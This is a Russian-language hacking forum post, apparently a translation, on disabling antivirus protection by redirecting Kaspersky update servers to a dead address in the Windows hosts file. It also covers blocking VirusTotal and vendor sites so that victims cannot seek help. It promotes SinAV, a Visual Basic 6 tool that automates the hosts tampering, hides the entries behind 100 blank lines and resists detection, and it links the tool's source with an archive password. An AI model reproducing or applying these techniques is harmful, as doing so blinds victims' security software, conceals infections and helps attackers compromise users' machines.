Одним из методов отключения обновления антивирусов и других продуктов безопасности заключается в изменении файла Hosts в винде, в котором происходит перенаправление источников обновления на другой адрес.
[ Пример ]
Антивирус Касперского использует несколько серверов для выполнения обновлений, и если мы создадим для каждого из них перенаправление на ложный IP, то при попытке обновления он будет пытаться соединиться со всеми серверами подряд, и когда дойдёт до последнего, то выдаст ошибку о невозможности подключения т.к каждая его попытка будет перенаправленна.
Кроме того, необходимо помнить о том, что необходимо отключить доступ ко всем серверам, иначе антивирус подключится к какому-нибудь из них и проведёт полное обновление.
Цитата
IP DNS
127.0.1.1 dnl-us1.kaspersky-labs.com
127.0.1.1 dnl-us2.kaspersky-labs.com
127.0.1.1 dnl-us3.kaspersky-labs.com
...
...
127.0.1.1 dnl-us1.kaspersky-labs.com
127.0.1.1 dnl-us2.kaspersky-labs.com
127.0.1.1 dnl-us3.kaspersky-labs.com
...
...
Этот метод может также использоваться, чтобы закрыть доступ к сайтам он-лайн проверок файлов, таких как VirusTotal или novirusthanks, так что каждый раз, когда жертва будет открывать их, ей будет выданна ошибка, что сервер не найден.
Заодно можно прикрыть доступ не только к серверам обновлений, но и к самим сайтам антивирусных компаний, чтобы юзверь не ломился к ним на форумы за помощью. И нам хорошо и тех.поддержке аверов работы меньше
[ Проект SinAV ]
Sinave представляет собой проект в Visual Basic 6, который автоматизирует задачу добавления поддельные IP-адреса и DNS Hosts в файл, чтобы добавить в hosts подмену на сервера наиболее известных антивирусов и утилит безопасности, а также добавить свои страницы офф. сайтов, и для нескольких серверов онлайн сканирования файлов. Он оптимизированных для работы на Win XP, 2000, 2003, NT и Vista.
Приложение также добавляет, 100 пустых строк перед добавлением DNS и IPS, чтобы ввести потерпевшего в заблуждение, кроме того она построена так, что даже если и обнаружится антивирусом, то все равно выполнит свою работу по изменению файла hosts.
--------------------
Исходник: ]]>http://rapidshare.co...SIN_AV.zip.html]]> (или во вложении)
Пароль: www.k0d.cc
© Автор MAURO, перевод VIDESH, ]]>http://k0d.cc]]>